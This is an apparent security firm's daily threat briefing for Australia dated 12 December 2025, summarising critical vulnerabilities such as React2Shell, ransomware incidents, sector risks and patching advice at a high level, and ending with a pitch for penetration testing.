Daily Threat Briefing: Australia – 12 December 2025

Executive Summary

The Australian cyber threat landscape for the last 24 hours has been dominated by the critical "React2Shell" vulnerability and the fallout from December’s "Patch Tuesday". State-sponsored actors and ransomware groups are moving with speed to exploit these new vectors. Additionally, a new report highlights a disturbing rise in data leakage through enterprise AI tools, impacting Australian SaaS and FinTech sectors heavily.

Top Critical Vulnerabilities: Immediate Action Required

  • "React2Shell" (CVE-2025-55182) – CVSS 10.0

    • The Threat: A pre-authentication Remote Code Execution (RCE) vulnerability affecting React Server Components (React 19.x and Next.js 15.x/16.x).
    • Status: Active Exploitation. China-nexus threat groups (Earth Lamia, Jackpot Panda) and botnets (Mirai) are actively scanning for and exploiting this flaw across Australian web assets.
    • Action: Immediate patching or WAF rule deployment is mandatory for any organisation using Next.js App Router.

  • Microsoft Zero-Day (CVE-2025-62221) – CVSS 7.8

    • The Threat: A use-after-free Elevation of Privilege vulnerability in the Windows Cloud Files Mini Filter Driver.
    • Status: Confirmed exploitation in the wild. Attackers are using this to gain SYSTEM privileges on compromised endpoints.
    • Action: Apply the December 2025 Patch Tuesday updates immediately.

  • Google Chrome Zero-Day

    • Google has issued an emergency update (Dec 11) for a new zero-day actively used in attacks. Ensure all browser instances are updated to the latest stable channel.

Sector-Specific Updates

Healthcare & Pharma

  • Inotiv Ransomware Incident: The pharmaceutical research firm Inotiv has confirmed a significant breach by the Qilin ransomware group. Data relating to clinical research and potentially sensitive patient cohorts has been exfiltrated. This follows the broader trend where healthcare remains the most breached sector in Australia for 2025.
  • Guidance: Isolate backup servers and review third-party vendor connections, as supply chain compromises are the primary vector for Qilin.

SaaS & AI Providers

  • AI Data Leakage Surge: A new report released yesterday indicates that 1 in 35 enterprise prompts sent to Generative AI tools now contain sensitive data (PII, source code, or internal credentials).
  • SaaS Impact: Australian SaaS providers are urged to implement strict "AI DLP" (Data Loss Prevention) policies. Unmonitored use of AI copilots is currently the fastest-growing shadow IT risk.

Government & Education

  • Services Australia Data Governance: Following a spike in data breaches involving Medicare and Centrelink credentials, the Federal Government is reviewing new powers to force rapid disclosure from third-party providers. Agencies should prepare for stricter compliance reporting requirements.
  • Education Sector Targeting: Australian universities continue to face high volumes of brute-force attacks targeting authentication gateways, with recent incidents at UWA highlighting the fragility of password-only defences.

FinTech & eCommerce

  • API Security Crisis: With 95% of Australian organisations reporting API security incidents this year, FinTechs are the prime target. Recent attacks have shifted from simple injection to Broken Object Level Authorization (BOLA), allowing attackers to scrape customer financial data by manipulating API calls.
  • Threat Actor Watch: The Kairos ransomware group is actively targeting mid-tier Australian financial services, leveraging misconfigured cloud APIs for initial access.

IoT & Critical Infrastructure

  • Satellite Supply Chain: New vulnerabilities in satellite ground control software have prompted the release of specialized defence tools by South Australian researchers. Operators in the space and defence supply chain (such as those connected to the REDBACK program) must heighten vigilance against espionage-focused groups like Cyber Toufan.

Threat Actor Focus: Qilin & Earth Lamia

  • Qilin: Currently aggressive in the healthcare space, utilising double-extortion tactics. They are known to weaponise stolen data quickly if ransoms are not paid.
  • Earth Lamia: A state-sponsored group rapidly operationalising the React2Shell vulnerability to establish persistence in critical networks before patches can be applied.

Recommendation Organisations must pivot from reactive patching to proactive threat hunting. With vulnerabilities like React2Shell allowing pre-auth RCE, perimeter defences are being bypassed in minutes. Ensure your EDR is tuned to detect post-exploitation behaviour, particularly "living-off-the-land" techniques using PowerShell (relevant to the new CVE-2025-54100).

Contact us for a quote for penetration testing service or adversary simulation.

Contact us for a quote